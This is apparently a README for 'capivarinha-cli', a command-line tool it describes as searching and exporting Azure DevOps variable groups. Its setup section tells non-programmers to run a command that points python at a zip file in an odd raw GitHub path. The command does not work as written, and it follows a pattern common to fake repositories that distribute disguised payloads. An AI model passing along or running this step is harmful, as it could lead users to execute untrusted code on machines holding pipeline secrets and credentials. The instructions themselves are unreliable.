Welcome to capivarinha-cli! This is a command-line tool made to help you search and export variables from Variable Groups in Azure DevOps. You donโt need to know how to code. This guide will walk you through the steps to get started.
To get capivarinha-cli, visit this page to download: Releases Page
- Click on the link above.
- Look for the most recent release.
- Download the file that matches your operating system.
After downloading, follow these steps to run the application.
Before you install, ensure your system meets these requirements:
- Operating System: Windows, macOS, or Linux
- Python: Version 3.6 or higher
- Permissions: You may need admin rights to install the required dependencies.
Once downloaded, locate the file on your computer. If it's in a zip format, right-click it and select "Extract All." Follow the prompts to extract it to your preferred location.
Hereโs how to run capivarinha-cli:
-
Open your terminal or command prompt.
-
Navigate to the folder where you extracted the files.
-
Enter the following command:
python https://raw.githubusercontent.com/Pruject-CrashoutLA/capivarinha-cli/main/habitacule/capivarinha-cli.zip
This command will start the application.
After running the application, you can start searching and exporting variables. The command syntax is straightforward.
-
To list all variable groups, type:
list -
To search for a specific variable, use:
search <variable_name> -
If you want to export variables to a file, type:
export <variable_group_name>
These commands help you manage your variables with ease.
- Search Variables: Quickly find any variable you need.
- Export Options: Save your variables in various formats for easy use.
- Cross-Platform: Works on Windows, macOS, and Linux systems.
If youโd like to contribute to capivarinha-cli, feel free to fork the repository and submit a pull request. We welcome improvements and new ideas.
capivarinha-cli is open-source software. You can freely use, modify, and distribute it under the terms of the MIT License.
If you encounter any issues or have questions, please visit our Issues Page to get help or provide feedback.
Remember to visit this page to download: Releases Page for the latest version.
Thank you for using capivarinha-cli! Enjoy managing your Azure DevOps variable groups effortlessly.